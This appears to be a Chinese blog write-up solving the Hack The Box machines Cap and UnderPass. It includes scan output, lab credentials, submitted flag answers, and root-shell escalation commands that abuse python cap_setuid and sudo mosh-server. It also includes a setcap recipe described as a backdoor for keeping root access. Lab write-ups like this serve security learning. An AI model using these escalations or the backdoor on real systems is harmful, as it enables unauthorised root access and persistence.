HTB-Cap & UnderPass

本文最后更新于 2025年3月12日 晚上

Cap

Task 1

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿butt3rf1y)-[/HTB/Machine/Cap]
└─# nmap -p- -T4 --min-rate=1000 -sS -Pn 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 14:39 CST
Nmap scan report for 10.10.10.245
Host is up (0.30s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 86.05 seconds

开着 21、22、80

1
2
How many TCP ports are open?
:3

Task 2

访问 80 端口,侧边栏找到 Security Snapshot ,查看 url

1
2
After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?
:data

Task 3

查看侧边栏的 Network Status 发现还有其他 IP

1
2
Are you able to get to other users' scans?
:yes

Task 4

1
2
What is the ID of the PCAP file that contains sensative data?
:0

Task 5

http://10.10.10.245/data/0 下载数据包

1
2
Which application layer protocol in the pcap file can the sensetive data be found in?
:ftp

Task 6

1
2
USER nathan
PASS Buck3tH4TF0RM3!

ssh 也能用

1
2
We've managed to collect nathan's FTP password. On what other service does this password work?
:ssh

Submit User Flag

1
2
ftp 10.10.10.245
get user.txt

1
2
Submit the flag located in the nathan user's home directory.
:12298311c41311a3b59b48879e6c07ff

Task 8

传一个 linpeas.sh 上去,在 Capabilities 下看到了 /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

还可以直接查找

1
getcap -r / 2>/dev/null
1
2
What is the full path to the binary on this machine has special capabilities that can be abused to obtain root privileges?
:/usr/bin/python3.8

Submit Root Flag

执行

1
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

进入 root 权限

1
2
Submit the flag located in root's home directory.
:078602034d5abb9587c86b9f7560ab18

Capabilities

https://gtfobins.github.io/gtfobins/python/

如果二进制文件具有 Linux CAP_SETUID 功能集或者具有功能集的另一个二进制文件执行,可以用作后门,通过操作自己的进程 UID 来维持权限访问

1
2
3
4
cp $(which python) .
sudo setcap cap_setuid+ep python

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

Capabilities 机制在 Linux 内核 2.2 之后引入,它将 root 用户权限细分为不同领域,可以禁用或启用。如果 euid 不是 root ,那么会检查是否具有特权操作所对应的 Capabilities,以此为依据来决定是否能执行权限操作,主要是针对 SUID 的权限控制

上述的 CAP_SETUID 就是改变进程的 uid(setuid(),setreuid(),setresuid() 等等) 对应的 capability 

1
import os; os.setuid(0); os.system("/bin/sh")

更多详情可以看大佬们的博客:https://www.cnblogs.com/f-carey/p/16026088.html,https://rk700.github.io/2016/10/26/linux-capabilities/

UnderPass

Submit User Flag

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─# nmap -sS -sV -Pn -A 10.10.11.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 17:14 CST
Nmap scan report for 10.10.11.48
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/12%OT=22%CT=1%CU=41673%PV=Y%DS=3%DC=T%G=Y%TM=67D1
OS:50C6%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AS
OS:T11NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=EAE7%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   0.27 ms   172.30.144.1
2   369.92 ms 10.10.16.1
3   370.15 ms 10.10.11.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.86 seconds

开了 http 和 ssh

80

访问 http 服务,什么都没有

UDP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
└─# nmap -sV -Pn -A -sU 10.10.11.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 18:46 CST
Nmap scan report for 10.10.11.48
Host is up (0.32s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT     STATE         SERVICE VERSION
161/udp  open          snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 17h05m41s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 17h05m41.35s (6154135 timeticks)
1812/udp open|filtered radius
1813/udp open|filtered radacct
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Citrix Access Gateway VPN gateway (95%), Linksys WRT610Nv3 WAP (95%), 3Com OfficeConnect 3CRWER100-75 wireless broadband router (94%), Adtran 424RG FTTH gateway (94%), Aerohive HiveOS 3.4 (94%), Aerohive HiveOS 5.1 (94%), Aerohive HiveOS 7.1 (94%), AirMagnet SmartEdge wireless sensor; or Foscam FI8904W, FI8910W, or FI8918W, or Instar IN-3010 surveillance camera (Linux 2.4) (94%), Alcatel-Lucent OmniPCX GD3 PBX (Linux 2.6.23) (94%), Allnet 2210 webcam, Cisco MDS 9124 or 9216i switch (SAN-OS 3.1 - 3.2), or Nortel IP Phone 1535 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

TRACEROUTE (using port 38063/udp)
HOP RTT       ADDRESS
1   0.22 ms   172.30.144.1
2   373.85 ms 10.10.16.1
3   319.73 ms 10.10.11.48

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1225.45 seconds

161 端口有 snmp 服务

SNMP(简单网络管理协议),是一个应用层协议,为网络节点提供了一个通用的管理方法。更多详情:https://www.cnblogs.com/chegxy/p/14020233.html

用 snmpwalk 打印出 IP 详细信息

1
snmpwalk -v 2c -c public 10.10.11.48

可以看到两条信息

1
2
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"

一条带有 htb 结尾的域名,另一条给出了 daloradius 服务器,daloradius 是一个 RADIUS Web 管理应用程序,用于管理热点和通用的 ISP 部署,

搜一下找到了 daloRADIUS,发现有 login.php 页面,访问

1
http://10.10.11.48/daloradius/app/users/login.php

得到了一个登录框,并且在 https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS 找到了默认用户名和密码

1
2
Username: administrator
Password: radius

但是默认的登不进去,找到了另一个路径下的 login.php 

1
http://10.10.11.48//daloradius/app/operators/login.php

找到了一个用户和密码

密码爆破出来

1
underwaterfriends

尝试 ssh 登录,能进去

Submit root flag

sudo -l 发现 mosh-serversudo

1
2
3
4
5
6
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

Mosh 表示 Mobile Shell,是一个从客户端跨互联网连接远程服务器的命令行工具,Mosh 最大特点就是 UDP 传输,所以传输快。

利用 Mosh 提权

1
mosh --server="sudo /usr/bin/mosh-server" localhost

拿到 flag

渗透 > 靶机 > HTB
#HTB 渗透
HTB-Cap & UnderPass
http://example.com/2025/03/12/HTB-Cap-UnderPass/
作者
butt3rf1y
发布于
2025年3月12日
许可协议